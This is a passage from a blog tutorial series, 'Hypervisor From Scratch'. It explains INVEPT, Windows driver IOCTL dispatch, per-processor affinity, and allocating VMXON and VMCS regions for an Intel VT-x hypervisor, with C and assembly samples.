Imagine we access guest-physical-address 0x1000,it’ll get translated to host-physical-address 0x5000. Next time, if we access 0x1000, the CPU won’t send the request to the memory bus but uses cached memory instead. it’s faster. Now let’s say we change EPT_PDPT->PhysicalAddress to point to different EPT PD or change the attributes of one of the EPT tables, now we have to tell the processor that your cache is invalid and that’s what exactly INVEPT performs.

Now we have two terms here, Single-Context and All-Context.

Single-Context means, that you invalidate all EPT-derived translations based on a single EPTP (in short: for single VM).

All-Context means that you invalidate all EPT-derived translations. (for every-VM).

So in case if you wouldn’t perform INVEPT after changing EPT’s structures, you would be risking that the CPU would reuse old translations.

Basically, any change to EPT structure needs INVEPT but switching EPT (or VMCS) doesn’t need INVEPT because that translation will be “tagged” with the changed EPTP in the cache.

The following assembly function is responsible for INVEPT.

12345678910111213INVEPT_Instruction PROC PUBLIC        invept  rcx, oword ptr [rdx]        jz @jz        jc @jc        xor     rax, rax        ret @jz:    mov     rax, VMX_ERROR_CODE_FAILED_WITH_STATUS        ret @jc:    mov     rax, VMX_ERROR_CODE_FAILED        retINVEPT_Instruction ENDP


123    VMX_ERROR_CODE_SUCCESS              = 0    VMX_ERROR_CODE_FAILED_WITH_STATUS   = 1    VMX_ERROR_CODE_FAILED               = 2

Now, we implement INVEPT.

12345678910unsigned char INVEPT(UINT32 type, INVEPT_DESC* descriptor){ if (!descriptor) { static INVEPT_DESC zero_descriptor = { 0 }; descriptor = &zero_descriptor; }  return INVEPT_Instruction(type, descriptor);}

To invalidate all the contexts use the following function.

1234unsigned char INVEPT_ALL_CONTEXTS(){ return INVEPT(all_contexts ,NULL);}

And the last step is for Single-Context INVEPT which needs an EPTP.

12345unsigned char INVEPT_SINGLE_CONTEXT(EPTP ept_pointer){ INVEPT_DESC descriptor = { ept_pointer, 0 }; return INVEPT(single_context, &descriptor);}

Using the above functions in a modification state, tell the processor to invalidate its cache.


In this part, we see how to initialize the Extended Page Table and map guest physical address to host physical address then we build the EPTP based on the allocated addresses.

The future part would be about building the VMCS and implementing other VMX instructions. Don’t forget to check the blog for the future posts.

Have a good time!


[1] Vol 3C – 28.2 THE EXTENDED PAGE TABLE MECHANISM (EPT) (https://software.intel.com/en-us/articles/intel-sdm)

[2] Performance Evaluation of Intel EPT Hardware Assist (https://www.vmware.com/pdf/Perf_ESX_Intel-EPT-eval.pdf)

[3] Second Level Address Translation (https://en.wikipedia.org/wiki/Second_Level_Address_Translation)  

[4] Memory Virtualization (http://www.cs.nthu.edu.tw/~ychung/slides/Virtualization/VM-Lecture-2-2-SystemVirtualizationMemory.pptx)  [5] Best Practices for Paravirtualization Enhancements from Intel® Virtualization Technology: EPT and VT-d (https://software.intel.com/en-us/articles/best-practices-for-paravirtualization-enhancements-from-intel-virtualization-technology-ept-and-vt-d)[6] 5-Level Paging and 5-Level EPT (https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf) [7] Xen Summit November 2007 – Jun Nakajima (http://www-archive.xenproject.org/files/xensummit_fall07/12_JunNakajima.pdf) [8] gipervizor against rutkitov: as it works (http://developers-club.com/posts/133906/) [9] Intel SGX Explained (https://www.semanticscholar.org/paper/Intel-SGX-Explained-Costan-Devadas/2d7f3f4ca3fbb15ae04533456e5031e0d0dc845a) [10] Intel VT-x (https://github.com/tnballo/notebook/wiki/Intel-VTx) [11] Introduction to IA-32e hardware paging (https://www.triplefault.io/2017/07/introduction-to-ia-32e-hardware-paging.html)

Hypervisor From Scratch – Part 3: Setting up Our First Virtual Machine

( Original text by Sinaei )


This is the third part of the tutorial “Hypervisor From Scratch“. You may have noticed that the previous parts have steadily been getting more complicated. This part should teach you how to get started with creating your own VMM, we go to demonstrate how to interact with the VMM from Windows User-mode (IOCTL Dispatcher), then we solve the problems with the affinity and running code in a special core. Finally, we get familiar with initializing VMXON Regions and VMCS Regions then we load our hypervisor regions into each core and implement our custom functions to work with hypervisor instruction and many more things related to Virtual-Machine Control Data Structures (VMCS).

Some of the implementations derived from HyperBone (Minimalistic VT-X hypervisor with hooks) and HyperPlatform by Satoshi Tanda and hvpp which is great work by my friend Petr Beneš the person who really helped me creating these series.

The full source code of this tutorial is available on :


Interacting with VMM Driver from User-Mode

The most important function in IRP MJ functions for us is DrvIOCTLDispatcher (IRP_MJ_DEVICE_CONTROL) and that’s because this function can be called from user-mode with a special IOCTL number, it means you can have a special code in your driver and implement a special functionality corresponding this code, then by knowing the code (from user-mode) you can ask your driver to perform your request, so you can imagine that how useful this function would be.

Now let’s implement our functions for dispatching IOCTL code and print it from our kernel-mode driver.

As long as I know, there are several methods by which you can dispatch IOCTL e.g METHOD_BUFFERED, METHOD_NIETHER, METHOD_IN_DIRECT, METHOD_OUT_DIRECT. These methods should be followed by the user-mode caller (the difference are in the place where buffers transfer between user-mode and kernel-mode or vice versa), I just copy the implementations with some minor modification form Microsoft’s Windows Driver Samples, you can see the full code for user-mode and kernel-mode.

Imagine we have the following IOCTL codes:

12345678910111213141516171819//// Device type           — in the «User Defined» range.»//#define SIOCTL_TYPE 40000 //// The IOCTL function codes from 0x800 to 0xFFF are for customer use.//#define IOCTL_SIOCTL_METHOD_IN_DIRECT \    CTL_CODE( SIOCTL_TYPE, 0x900, METHOD_IN_DIRECT, FILE_ANY_ACCESS  ) #define IOCTL_SIOCTL_METHOD_OUT_DIRECT \    CTL_CODE( SIOCTL_TYPE, 0x901, METHOD_OUT_DIRECT , FILE_ANY_ACCESS  ) #define IOCTL_SIOCTL_METHOD_BUFFERED \    CTL_CODE( SIOCTL_TYPE, 0x902, METHOD_BUFFERED, FILE_ANY_ACCESS  ) #define IOCTL_SIOCTL_METHOD_NEITHER \    CTL_CODE( SIOCTL_TYPE, 0x903, METHOD_NEITHER , FILE_ANY_ACCESS  )

There is a convention for defining IOCTLs as it mentioned here,

The IOCTL is a 32-bit number. The first two low bits define the “transfer type” which can be METHOD_OUT_DIRECT, METHOD_IN_DIRECT, METHOD_BUFFERED or METHOD_NEITHER.

The next set of bits from 2 to 13 define the “Function Code”. The high bit is referred to as the “custom bit”. This is used to determine user-defined IOCTLs versus system defined. This means that function codes 0x800 and greater are customs defined similarly to how WM_USER works for Windows Messages.

The next two bits define the access required to issue the IOCTL. This is how the I/O Manager can reject IOCTL requests if the handle has not been opened with the correct access. The access types are such as FILE_READ_DATA and FILE_WRITE_DATA for example.

The last bits represent the device type the IOCTLs are written for. The high bit again represents user-defined values.

In IOCTL Dispatcher, The “Parameters.DeviceIoControl.IoControlCode” of the IO_STACK_LOCATIONcontains the IOCTL code being invoked.

For METHOD_IN_DIRECT and METHOD_OUT_DIRECT, the difference between IN and OUT is that with IN, you can use the output buffer to pass in data while the OUT is only used to return data.

The METHOD_BUFFERED is a buffer that the data is copied from this buffer. The buffer is created as the larger of the two sizes, the input or output buffer. Then the read buffer is copied to this new buffer. Before you return, you simply copy the return data into the same buffer. The return value is put into the IO_STATUS_BLOCK and the I/O Manager copies the data into the output buffer. The METHOD_NEITHERis the same.

Ok, let’s see an example :

First, we declare all our needed variable.

Note that the PAGED_CODE macro ensures that the calling thread is running at an IRQL that is low enough to permit paging.

123456789101112131415161718192021222324252627NTSTATUS DrvIOCTLDispatcher( PDEVICE_OBJECT DeviceObject, PIRP Irp){ PIO_STACK_LOCATION  irpSp;// Pointer to current stack location NTSTATUS            ntStatus = STATUS_SUCCESS;// Assume success ULONG               inBufLength; // Input buffer length ULONG               outBufLength; // Output buffer length PCHAR               inBuf, outBuf; // pointer to Input and output buffer PCHAR               data = «This String is from Device Driver !!!»; size_t              datalen = strlen(data) + 1;//Length of data including null PMDL                mdl = NULL; PCHAR               buffer = NULL;  UNREFERENCED_PARAMETER(DeviceObject);  PAGED_CODE();  irpSp = IoGetCurrentIrpStackLocation(Irp); inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength; outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;  if (!inBufLength || !outBufLength) { ntStatus = STATUS_INVALID_PARAMETER; goto End; } …

Then we have to use switch-case through the IOCTLs (Just copy buffers and show it from DbgPrint()).

123456789101112131415161718 switch (irpSp->Parameters.DeviceIoControl.IoControlCode) { case IOCTL_SIOCTL_METHOD_BUFFERED:  DbgPrint(«Called IOCTL_SIOCTL_METHOD_BUFFERED\n»); PrintIrpInfo(Irp); inBuf = Irp->AssociatedIrp.SystemBuffer; outBuf = Irp->AssociatedIrp.SystemBuffer; DbgPrint(«\tData from User :»); DbgPrint(inBuf); PrintChars(inBuf, inBufLength); RtlCopyBytes(outBuf, data, outBufLength); DbgPrint((«\tData to User : «)); PrintChars(outBuf, datalen); Irp->IoStatus.Information = (outBufLength < datalen ? outBufLength : datalen); break; …

The PrintIrpInfo is like this :

123456789101112131415161718VOID PrintIrpInfo(PIRP Irp){ PIO_STACK_LOCATION  irpSp; irpSp = IoGetCurrentIrpStackLocation(Irp);  PAGED_CODE();  DbgPrint(«\tIrp->AssociatedIrp.SystemBuffer = 0x%p\n», Irp->AssociatedIrp.SystemBuffer); DbgPrint(«\tIrp->UserBuffer = 0x%p\n», Irp->UserBuffer); DbgPrint(«\tirpSp->Parameters.DeviceIoControl.Type3InputBuffer = 0x%p\n», irpSp->Parameters.DeviceIoControl.Type3InputBuffer); DbgPrint(«\tirpSp->Parameters.DeviceIoControl.InputBufferLength = %d\n», irpSp->Parameters.DeviceIoControl.InputBufferLength); DbgPrint(«\tirpSp->Parameters.DeviceIoControl.OutputBufferLength = %d\n», irpSp->Parameters.DeviceIoControl.OutputBufferLength); return;}

Even though you can see all the implementations in my GitHub but that’s enough, in the rest of the post we only use the IOCTL_SIOCTL_METHOD_BUFFERED method.

Now from user-mode and if you remember from the previous part where we create a handle (HANDLE) using CreateFile, now we can use the DeviceIoControl to call DrvIOCTLDispatcher(IRP_MJ_DEVICE_CONTROL) along with our parameters from user-mode.

1234567891011121314151617181920212223242526272829 char OutputBuffer[1000]; char InputBuffer[1000]; ULONG bytesReturned; BOOL Result;  StringCbCopy(InputBuffer, sizeof(InputBuffer), «This String is from User Application; using METHOD_BUFFERED»);  printf(«\nCalling DeviceIoControl METHOD_BUFFERED:\n»);  memset(OutputBuffer, 0, sizeof(OutputBuffer));  Result = DeviceIoControl(handle, (DWORD)IOCTL_SIOCTL_METHOD_BUFFERED, &InputBuffer, (DWORD)strlen(InputBuffer) + 1, &OutputBuffer, sizeof(OutputBuffer), &bytesReturned, NULL );  if (!Result) { printf(«Error in DeviceIoControl : %d», GetLastError()); return 1;  } printf(»    OutBuffer (%d): %s\n», bytesReturned, OutputBuffer);

There is an old, yet great topic here which describes the different types of IOCT dispatching.

I think we’re done with WDK basics, its time to see how we can use Windows in order to build our VMM.

Per Processor Configuration and Setting Affinity

Affinity to a special logical processor is one of the main things that we should consider when working with the hypervisor.

Unfortunately, in Windows, there is nothing like on_each_cpu (like it is in Linux Kernel Module) so we have to change our affinity manually in order to run on each logical processor. In my Intel Core i7 6820HQ I have 4 physical cores and each core can run 2 threads simultaneously (due to the presence of hyper-threading) thus we have 8 logical processors and of course 8 sets of all the registers (including general purpose registers and MSR registers) so we should configure our VMM to work on 8 logical processors.

To get the count of logical processors you can use KeQueryActiveProcessors(), then we should pass a KAFFINITY mask to the KeSetSystemAffinityThread which sets the system affinity of the current thread.

KAFFINITY mask can be configured using a simple power function :

1234567891011121314151617int ipow(int base, int exp) { int result = 1; for (;;) { if ( exp & 1) { result *= base; } exp >>= 1; if (!exp) { break; } base *= base; } return result;}

then we should use the following code in order to change the affinity of the processor and run our code in all the logical cores separately:

12345678910 KAFFINITY kAffinityMask; for (size_t i = 0; i < KeQueryActiveProcessors(); i++) { kAffinityMask = ipow(2, i); KeSetSystemAffinityThread(kAffinityMask); DbgPrint(«=====================================================»); DbgPrint(«Current thread is executing in %d th logical processor.»,i); // Put you function here !  }

Conversion between the physical and virtual addresses

VMXON Regions and VMCS Regions (see below) use physical address as the operand to VMXON and VMPTRLD instruction so we should create functions to convert Virtual Address to Physical address:

1234UINT64 VirtualAddress_to_PhysicallAddress(void* va){ return MmGetPhysicalAddress(va).QuadPart;}

And as long as we can’t directly use physical addresses for our modifications in protected-mode then we have to convert physical address to virtual address.

1234567UINT64 PhysicalAddress_to_VirtualAddress(UINT64 pa){ PHYSICAL_ADDRESS PhysicalAddr; PhysicalAddr.QuadPart = pa;  return MmGetVirtualForPhysical(PhysicalAddr);}

Query about Hypervisor from the kernel

In the previous part, we query about the presence of hypervisor from user-mode, but we should consider checking about hypervisor from kernel-mode too. This reduces the possibility of getting kernel errors in the future or there might be something that disables the hypervisor using the lock bit, by the way, the following code checks IA32_FEATURE_CONTROL MSR (MSR address 3AH) to see if the lock bitis set or not.

123456789101112131415161718192021222324252627BOOLEAN Is_VMX_Supported(){ CPUID data = { 0 };  // VMX bit __cpuid((int*)&data, 1); if ((data.ecx & (1 << 5)) == 0) return FALSE;  IA32_FEATURE_CONTROL_MSR Control = { 0 }; Control.All = __readmsr(MSR_IA32_FEATURE_CONTROL);  // BIOS lock check if (Control.Fields.Lock == 0) { Control.Fields.Lock = TRUE; Control.Fields.EnableVmxon = TRUE; __writemsr(MSR_IA32_FEATURE_CONTROL, Control.All); } else if (Control.Fields.EnableVmxon == FALSE) { DbgPrint(«[*] VMX locked off in BIOS»); return FALSE; }  return TRUE;}

The structures used in the above function declared like this:

1234567891011121314151617181920212223typedef union _IA32_FEATURE_CONTROL_MSR{ ULONG64 All; struct { ULONG64 Lock : 1;                // [0] ULONG64 EnableSMX : 1;           // [1] ULONG64 EnableVmxon : 1;         // [2] ULONG64 Reserved2 : 5;           // [3-7] ULONG64 EnableLocalSENTER : 7;   // [8-14] ULONG64 EnableGlobalSENTER : 1;  // [15] ULONG64 Reserved3a : 16;         // ULONG64 Reserved3b : 32;         // [16-63] } Fields;} IA32_FEATURE_CONTROL_MSR, *PIA32_FEATURE_CONTROL_MSR; typedef struct _CPUID{ int eax; int ebx; int ecx; int edx;} CPUID, *PCPUID;

VMXON Region

Before executing VMXON, software should allocate a naturally aligned 4-KByte region of memory that a logical processor may use to support VMX operation. This region is called the VMXON region. The address of the VMXON region (the VMXON pointer) is provided in an operand to VMXON.

A VMM can (should) use different VMXON Regions for each logical processor otherwise the behavior is “undefined”.

Note: The first processors to support VMX operation require that the following bits be 1 in VMX operation: CR0.PE, CR0.NE, CR0.PG, and CR4.VMXE. The restrictions on CR0.PE and CR0.PG imply that VMX operation is supported only in paged protected mode (including IA-32e mode). Therefore, the guest software cannot be run in unpaged protected mode or in real-address mode. 

Now that we are configuring the hypervisor, we should have a global variable that describes the state of our virtual machine, I create the following structure for this purpose, currently, we just have two fields (VMXON_REGION and VMCS_REGION) but we will add new fields in this structure in the future parts.

12345typedef struct _VirtualMachineState{ UINT64 VMXON_REGION;                        // VMXON region UINT64 VMCS_REGION;                         // VMCS region} VirtualMachineState, *PVirtualMachineState;

And of course a global variable:

1extern PVirtualMachineState vmState;

I create the following function (in memory.c) to allocate VMXON Region and execute VMXON instruction using the allocated region’s pointer.

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162BOOLEAN Allocate_VMXON_Region(IN PVirtualMachineState vmState){ // at IRQL > DISPATCH_LEVEL memory allocation routines don’t work if (KeGetCurrentIrql() > DISPATCH_LEVEL) KeRaiseIrqlToDpcLevel();   PHYSICAL_ADDRESS PhysicalMax = { 0 }; PhysicalMax.QuadPart = MAXULONG64;   int VMXONSize = 2 * VMXON_SIZE; BYTE* Buffer = MmAllocateContiguousMemory(VMXONSize + ALIGNMENT_PAGE_SIZE, PhysicalMax);  // Allocating a 4-KByte Contigous Memory region  PHYSICAL_ADDRESS Highest = { 0 }, Lowest = { 0 }; Highest.QuadPart = ~0;  //BYTE* Buffer = MmAllocateContiguousMemorySpecifyCache(VMXONSize + ALIGNMENT_PAGE_SIZE, Lowest, Highest, Lowest, MmNonCached); if (Buffer == NULL) { DbgPrint(«[*] Error : Couldn’t Allocate Buffer for VMXON Region.»); return FALSE;// ntStatus = STATUS_INSUFFICIENT_RESOURCES; } UINT64 PhysicalBuffer = VirtualAddress_to_PhysicallAddress(Buffer);  // zero-out memory RtlSecureZeroMemory(Buffer, VMXONSize + ALIGNMENT_PAGE_SIZE); UINT64 alignedPhysicalBuffer = (BYTE*)((ULONG_PTR)(PhysicalBuffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  UINT64 alignedVirtualBuffer = (BYTE*)((ULONG_PTR)(Buffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  DbgPrint(«[*] Virtual allocated buffer for VMXON at %llx», Buffer); DbgPrint(«[*] Virtual aligned allocated buffer for VMXON at %llx», alignedVirtualBuffer); DbgPrint(«[*] Aligned physical buffer allocated for VMXON at %llx», alignedPhysicalBuffer);  // get IA32_VMX_BASIC_MSR RevisionId  IA32_VMX_BASIC_MSR basic = { 0 };   basic.All = __readmsr(MSR_IA32_VMX_BASIC);  DbgPrint(«[*] MSR_IA32_VMX_BASIC (MSR 0x480) Revision Identifier %llx», basic.Fields.RevisionIdentifier);   //* (UINT64 *)alignedVirtualBuffer  = 04;  //Changing Revision Identifier *(UINT64 *)alignedVirtualBuffer = basic.Fields.RevisionIdentifier;   int status = __vmx_on(&alignedPhysicalBuffer); if (status) { DbgPrint(«[*] VMXON failed with status %d\n», status); return FALSE; }  vmState->VMXON_REGION = alignedPhysicalBuffer;  return TRUE;}

Let’s explain the  above function,

123 // at IRQL > DISPATCH_LEVEL memory allocation routines don’t work if (KeGetCurrentIrql() > DISPATCH_LEVEL) KeRaiseIrqlToDpcLevel();

This code is for changing current IRQL Level to DISPATCH_LEVEL but we can ignore this code as long as we use MmAllocateContiguousMemory but if you want to use another type of memory for your VMXON region you should use  MmAllocateContiguousMemorySpecifyCache (commented), other types of memory you can use can be found here.

Note that to ensure proper behavior in VMX operation, you should maintain the VMCS region and related structures in writeback cacheable memory. Alternatively, you may map any of these regions or structures with the UC memory type. Doing so is strongly discouraged unless necessary as it will cause the performance of transitions using those structures to suffer significantly.

Write-back is a storage method in which data is written into the cache every time a change occurs, but is written into the corresponding location in main memory only at specified intervals or under certain conditions. Being cachable or not cachable can be determined from the cache disable bit in paging structures (PTE).

By the way, we should allocate 8192 Byte because there is no guarantee that Windows allocates the aligned memory so we can find a piece of 4096 Bytes aligned in 8196 Bytes. (by aligning I mean, the physical address should be divisible by 4096 without any reminder).

In my experience, the MmAllocateContiguousMemory allocation is always aligned, maybe it is because every page in PFN are allocated by 4096 bytes and as long as we need 4096 Bytes, then it’s aligned.

If you are interested in Page Frame Number (PFN) then you can read Inside Windows Page Frame Number (PFN) – Part 1 and Inside Windows Page Frame Number (PFN) – Part 2.

123456789 PHYSICAL_ADDRESS PhysicalMax = { 0 }; PhysicalMax.QuadPart = MAXULONG64;  int VMXONSize = 2 * VMXON_SIZE; BYTE* Buffer = MmAllocateContiguousMemory(VMXONSize, PhysicalMax);  // Allocating a 4-KByte Contigous Memory region if (Buffer == NULL) { DbgPrint(«[*] Error : Couldn’t Allocate Buffer for VMXON Region.»); return FALSE;// ntStatus = STATUS_INSUFFICIENT_RESOURCES; }

Now we should convert the address of the allocated memory to its physical address and make sure it’s aligned.

Memory that MmAllocateContiguousMemory allocates is uninitialized. A kernel-mode driver must first set this memory to zero. Now we should use RtlSecureZeroMemory for this case.

12345678910 UINT64 PhysicalBuffer = VirtualAddress_to_PhysicallAddress(Buffer);  // zero-out memory RtlSecureZeroMemory(Buffer, VMXONSize + ALIGNMENT_PAGE_SIZE); UINT64 alignedPhysicalBuffer = (BYTE*)((ULONG_PTR)(PhysicalBuffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1)); UINT64 alignedVirtualBuffer = (BYTE*)((ULONG_PTR)(Buffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  DbgPrint(«[*] Virtual allocated buffer for VMXON at %llx», Buffer); DbgPrint(«[*] Virtual aligned allocated buffer for VMXON at %llx», alignedVirtualBuffer); DbgPrint(«[*] Aligned physical buffer allocated for VMXON at %llx», alignedPhysicalBuffer);

From Intel’s manual (24.11.5 VMXON Region ):

Before executing VMXON, software should write the VMCS revision identifier to the VMXON region. (Specifically, it should write the 31-bit VMCS revision identifier to bits 30:0 of the first 4 bytes of the VMXON region; bit 31 should be cleared to 0.)

It need not initialize the VMXON region in any other way. Software should use a separate region for each logical processor and should not access or modify the VMXON region of a logical processor between the execution of VMXON and VMXOFF on that logical processor. Doing otherwise may lead to unpredictable behavior.

So let’s get the Revision Identifier from IA32_VMX_BASIC_MSR  and write it to our VMXON Region.

1234567891011 // get IA32_VMX_BASIC_MSR RevisionId  IA32_VMX_BASIC_MSR basic = { 0 };   basic.All = __readmsr(MSR_IA32_VMX_BASIC);  DbgPrint(«[*] MSR_IA32_VMX_BASIC (MSR 0x480) Revision Identifier %llx», basic.Fields.RevisionIdentifier);  //Changing Revision Identifier *(UINT64 *)alignedVirtualBuffer = basic.Fields.RevisionIdentifier;

The last part is used for executing VMXON instruction.

12345678910 int status = __vmx_on(&alignedPhysicalBuffer); if (status) { DbgPrint(«[*] VMXON failed with status %d\n», status); return FALSE; }  vmState->VMXON_REGION = alignedPhysicalBuffer;  return TRUE;

__vmx_on is the intrinsic function for executing VMXON. The status code shows diffrenet meanings.

0The operation succeeded.
1The operation failed with extended status available in the VM-instruction error field of the current VMCS.
2The operation failed without status available.

If we set the VMXON Region using VMXON and it fails then status = 1. If there isn’t any VMCS the status =2 and if the operation was successful then status =0.

If you execute the above code twice without executing VMXOFF then you definitely get errors.

Now, our VMXON Region is ready and we’re good to go.

Virtual-Machine Control Data Structures (VMCS)

A logical processor uses virtual-machine control data structures (VMCSs) while it is in VMX operation. These manage transitions into and out of VMX non-root operation (VM entries and VM exits) as well as processor behavior in VMX non-root operation. This structure is manipulated by the new instructions VMCLEAR, VMPTRLD, VMREAD, and VMWRITE.

VMX Life cycle

The above picture illustrates the lifecycle VMX operation on VMCS Region.

Initializing  VMCS Region

A VMM can (should) use different VMCS Regions so you need to set logical processor affinity and run you initialization routine multiple times.

The location where the VMCS located is called “VMCS Region”.

VMCS Region is a

  • 4 Kbyte (bits 11:0 must be zero)
  • Must be aligned to the 4KB boundary

This pointer must not set bits beyond the processor’s physical-address width (Software can determine a processor’s physical-address width by executing CPUID with 80000008H in EAX. The physical-address width is returned in bits 7:0 of EAX.)

There might be several VMCSs simultaneously in a processor but just one of them is currently active and the VMLAUNCH, VMREAD, VMRESUME, and VMWRITE instructions operate only on the current VMCS.

Using VMPTRLD sets the current VMCS on a logical processor.

The memory operand of the VMCLEAR instruction is also the address of a VMCS. After execution of the instruction, that VMCS is neither active nor current on the logical processor. If the VMCS had been current on the logical processor, the logical processor no longer has a current VMCS.

VMPTRST is responsible to give the current VMCS pointer it stores the value FFFFFFFFFFFFFFFFH if there is no current VMCS.

The launch state of a VMCS determines which VM-entry instruction should be used with that VMCS. The VMLAUNCH instruction requires a VMCS whose launch state is “clear”; the VMRESUME instruction requires a VMCS whose launch state is “launched”. A logical processor maintains a VMCS’s launch state in the corresponding VMCS region.

If the launch state of the current VMCS is “clear”, successful execution of the VMLAUNCH instruction changes the launch state to “launched”.

The memory operand of the VMCLEAR instruction is the address of a VMCS. After execution of the instruction, the launch state of that VMCS is “clear”.

There are no other ways to modify the launch state of a VMCS (it cannot be modified using VMWRITE) and there is no direct way to discover it (it cannot be read using VMREAD).

The following picture illustrates the contents of a VMCS Region.

VMCS Region

The following code is responsible for allocating VMCS Region :

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061BOOLEAN Allocate_VMCS_Region(IN PVirtualMachineState vmState){ // at IRQL > DISPATCH_LEVEL memory allocation routines don’t work if (KeGetCurrentIrql() > DISPATCH_LEVEL) KeRaiseIrqlToDpcLevel();   PHYSICAL_ADDRESS PhysicalMax = { 0 }; PhysicalMax.QuadPart = MAXULONG64;   int VMCSSize = 2 * VMCS_SIZE; BYTE* Buffer = MmAllocateContiguousMemory(VMCSSize + ALIGNMENT_PAGE_SIZE, PhysicalMax);  // Allocating a 4-KByte Contigous Memory region  PHYSICAL_ADDRESS Highest = { 0 }, Lowest = { 0 }; Highest.QuadPart = ~0;  //BYTE* Buffer = MmAllocateContiguousMemorySpecifyCache(VMXONSize + ALIGNMENT_PAGE_SIZE, Lowest, Highest, Lowest, MmNonCached);  UINT64 PhysicalBuffer = VirtualAddress_to_PhysicallAddress(Buffer); if (Buffer == NULL) { DbgPrint(«[*] Error : Couldn’t Allocate Buffer for VMCS Region.»); return FALSE;// ntStatus = STATUS_INSUFFICIENT_RESOURCES; } // zero-out memory RtlSecureZeroMemory(Buffer, VMCSSize + ALIGNMENT_PAGE_SIZE); UINT64 alignedPhysicalBuffer = (BYTE*)((ULONG_PTR)(PhysicalBuffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  UINT64 alignedVirtualBuffer = (BYTE*)((ULONG_PTR)(Buffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));    DbgPrint(«[*] Virtual allocated buffer for VMCS at %llx», Buffer); DbgPrint(«[*] Virtual aligned allocated buffer for VMCS at %llx», alignedVirtualBuffer); DbgPrint(«[*] Aligned physical buffer allocated for VMCS at %llx», alignedPhysicalBuffer);  // get IA32_VMX_BASIC_MSR RevisionId  IA32_VMX_BASIC_MSR basic = { 0 };   basic.All = __readmsr(MSR_IA32_VMX_BASIC);  DbgPrint(«[*] MSR_IA32_VMX_BASIC (MSR 0x480) Revision Identifier %llx», basic.Fields.RevisionIdentifier);   //Changing Revision Identifier *(UINT64 *)alignedVirtualBuffer = basic.Fields.RevisionIdentifier;   int status = __vmx_vmptrld(&alignedPhysicalBuffer); if (status) { DbgPrint(«[*] VMCS failed with status %d\n», status); return FALSE; }  vmState->VMCS_REGION = alignedPhysicalBuffer;  return TRUE;}

The above code is exactly the same as VMXON Region except for __vmx_vmptrld instead of __vmx_on__vmx_vmptrld  is the intrinsic function for VMPTRLD instruction.

In VMCS also we should find the Revision Identifier from MSR_IA32_VMX_BASIC  and write in VMCS Region before executing VMPTRLD.

The MSR_IA32_VMX_BASIC  is defined as below.

123456789101112131415161718typedef union _IA32_VMX_BASIC_MSR{ ULONG64 All; struct { ULONG32 RevisionIdentifier : 31;   // [0-30] ULONG32 Reserved1 : 1;             // [31] ULONG32 RegionSize : 12;           // [32-43] ULONG32 RegionClear : 1;           // [44] ULONG32 Reserved2 : 3;             // [45-47] ULONG32 SupportedIA64 : 1;         // [48] ULONG32 SupportedDualMoniter : 1;  // [49] ULONG32 MemoryType : 4;            // [50-53] ULONG32 VmExitReport : 1;          // [54] ULONG32 VmxCapabilityHint : 1;     // [55] ULONG32 Reserved3 : 8;             // [56-63] } Fields;} IA32_VMX_BASIC_MSR, *PIA32_VMX_BASIC_MSR;


After configuring the above regions, now its time to think about DrvClose when the handle to the driver is no longer maintained by the user-mode application. At this time, we should terminate VMX and free every memory that we allocated before.

The following function is responsible for executing VMXOFF then calling to MmFreeContiguousMemoryin order to free the allocated memory :

123456789101112131415161718192021void Terminate_VMX(void) {  DbgPrint(«\n[*] Terminating VMX…\n»);  KAFFINITY kAffinityMask; for (size_t i = 0; i < ProcessorCounts; i++) { kAffinityMask = ipow(2, i); KeSetSystemAffinityThread(kAffinityMask); DbgPrint(«\t\tCurrent thread is executing in %d th logical processor.», i);   __vmx_off(); MmFreeContiguousMemory(PhysicalAddress_to_VirtualAddress(vmState[i].VMXON_REGION)); MmFreeContiguousMemory(PhysicalAddress_to_VirtualAddress(vmState[i].VMCS_REGION));  }  DbgPrint(«[*] VMX Operation turned off successfully. \n»); }

Keep in mind to convert VMXON and VMCS Regions to virtual address because MmFreeContiguousMemory accepts VA, otherwise, it leads to a BSOD.

Ok, It’s almost done!

Testing our VMM

Let’s create a test case for our code, first a function for Initiating VMXON and VMCS Regions through all logical processor.

1234567891011121314151617181920212223242526272829303132333435363738PVirtualMachineState vmState;int ProcessorCounts; PVirtualMachineState Initiate_VMX(void) {  if (!Is_VMX_Supported()) { DbgPrint(«[*] VMX is not supported in this machine !»); return NULL; }  ProcessorCounts = KeQueryActiveProcessorCount(0); vmState = ExAllocatePoolWithTag(NonPagedPool, sizeof(VirtualMachineState)* ProcessorCounts, POOLTAG);   DbgPrint(«\n=====================================================\n»);  KAFFINITY kAffinityMask; for (size_t i = 0; i < ProcessorCounts; i++) { kAffinityMask = ipow(2, i); KeSetSystemAffinityThread(kAffinityMask); // do st here ! DbgPrint(«\t\tCurrent thread is executing in %d th logical processor.», i);  Enable_VMX_Operation(); // Enabling VMX Operation DbgPrint(«[*] VMX Operation Enabled Successfully !»);  Allocate_VMXON_Region(&vmState[i]); Allocate_VMCS_Region(&vmState[i]);   DbgPrint(«[*] VMCS Region is allocated at  ===============> %llx», vmState[i].VMCS_REGION); DbgPrint(«[*] VMXON Region is allocated at ===============> %llx», vmState[i].VMXON_REGION);  DbgPrint(«\n=====================================================\n»); }}

The above function should be called from IRP MJ CREATE so let’s modify our DrvCreate to :

123456789101112131415NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){  DbgPrint(«[*] DrvCreate Called !»);  if (Initiate_VMX()) { DbgPrint(«[*] VMX Initiated Successfully.»); }  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

And modify DrvClose to :

